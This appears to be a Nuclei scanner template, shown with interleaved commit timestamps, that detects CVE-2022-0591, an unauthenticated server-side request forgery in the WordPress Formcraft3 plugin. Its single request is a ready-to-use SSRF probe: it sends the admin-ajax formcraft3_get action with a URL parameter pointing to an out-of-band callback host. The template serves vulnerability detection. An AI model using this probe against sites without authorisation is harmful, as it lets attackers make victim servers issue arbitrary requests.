2022-04-29 19:53:32 +00:00
id : CVE-2022-0591
info :
2022-05-18 20:58:07 +00:00
name : Formcraft3 <3.8.28 - Server-Side Request Forgery
2022-04-29 19:53:32 +00:00
author : Akincibor
2022-04-30 20:27:48 +00:00
severity : critical
2022-05-18 20:58:07 +00:00
description : Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.
2022-04-29 19:53:32 +00:00
reference :
- https://wpscan.com/vulnerability/b5303e63-d640-4178-9237-d0f524b13d47
- https://nvd.nist.gov/vuln/detail/CVE-2022-0591
2022-04-30 20:27:48 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
2023-04-12 10:55:48 +00:00
cvss-score : 9.1
2022-04-30 20:27:48 +00:00
cve-id : CVE-2022-0591
cwe-id : CWE-918
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:*:*:*
epss-score : 0.00509
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-04-12 10:55:48 +00:00
tags : wp,wp-plugin,wordpress,cve,formcraft3,wpscan,ssrf,cve2022,unauth
2022-04-29 19:53:32 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-04-29 19:53:32 +00:00
- method : GET
path :
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}'
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"
2022-05-18 20:58:07 +00:00
# Enhanced by mp on 2022/05/18